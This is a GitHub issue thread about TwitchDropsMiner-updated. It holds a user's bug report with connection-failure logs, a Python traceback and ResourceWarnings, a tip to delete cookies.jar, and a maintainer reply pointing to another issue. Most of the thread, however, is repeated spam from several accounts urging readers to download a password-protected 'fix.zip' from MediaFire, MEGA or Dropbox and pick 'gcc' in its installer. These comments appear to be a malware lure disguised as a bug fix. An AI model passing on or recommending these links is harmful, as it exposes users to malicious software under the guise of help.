### ISSUE TITLE
Cannot Connect to Twitch and Resource Warning Errors

### ISSUE THREAD

**Issue by fxceptioN** [Windows200000/TwitchDropsMiner-updated#174]
### Description

With TDM working, Often after a while I get cannot connect to twitch and errors such as

`
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:15:56: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:16:05: Earned points for watching:  10, total: 12810
2024-08-24 23:18:15: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:15: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:15: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:15: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:15: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:27: Cannot connect to Twitch, retrying in 180 seconds...
2024-08-24 23:18:56: Fatal error encountered:

2024-08-24 23:18:56: Traceback (most recent call last):
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/channel.py", line 249, in get_stream
    response: JsonType = await self._twitch.gql_request(
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/twitch.py", line 1543, in gql_request
    async with self.request(
  File "/usr/lib/python3.10/contextlib.py", line 199, in __aenter__
    return await anext(self.gen)
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/twitch.py", line 1503, in request
    response = await self.gui.coro_unless_closed(
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/gui.py", line 2132, in coro_unless_closed
    raise ExitRequest()
exceptions.ExitRequest: Application was requested to exit

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/main.py", line 160, in main
    await client.run()
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/twitch.py", line 772, in run
    await self._run()
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/twitch.py", line 915, in _run
    await asyncio.gather(
  File "/home/user/Downloads/TwitchDropsMiner-updated-15.8.2/channel.py", line 286, in update_stream
    self._stream = await self.get_stream()

  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f3178418220>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f3178767880>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
2024-08-24 23:39:28: Progress: 381/450 - Escape from Tarkov, Summer Twitch Drops day 2 pt.1
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f3178bfd000>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f3178766260>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f3178419d20>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
2024-08-24 23:40:30: Progress: 382/450 - Escape from Tarkov, Summer Twitch Drops day 2 pt.1
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f31797740a0>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
2024-08-24 23:40:59: Earned points for watching:  10, total: 12860
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f317841b6a0>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
/usr/lib/python3.10/asyncio/sslproto.py:320: ResourceWarning: unclosed transport <asyncio.sslproto._SSLProtocolTransport object at 0x7f3178767940>
  _warn(f"unclosed transport {self!r}", ResourceWarning, source=self)
ResourceWarning: Enable tracemalloc to get the object allocation traceback
2024-08-24 23:41:32: Progress: 383/450 - Escape from Tarkov, Summer Twitch Drops day 2 pt.1

`

### To Reproduce

Leave TDM open for a while, while getting drops.

### Expected behavior

I'm assuming the app working properly is the expected behavior. 

### Observed behavior

App becomes unresponsive for a while trying to exit and reopen the app.

### OS

Ubuntu Gnome on VPS.

### Build

source

### Version/Commit

latest source.

**Comment by zelda0079** [comment]
Try to delete the cookies.jar.

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Windows200000** [comment]
Tracked in #172
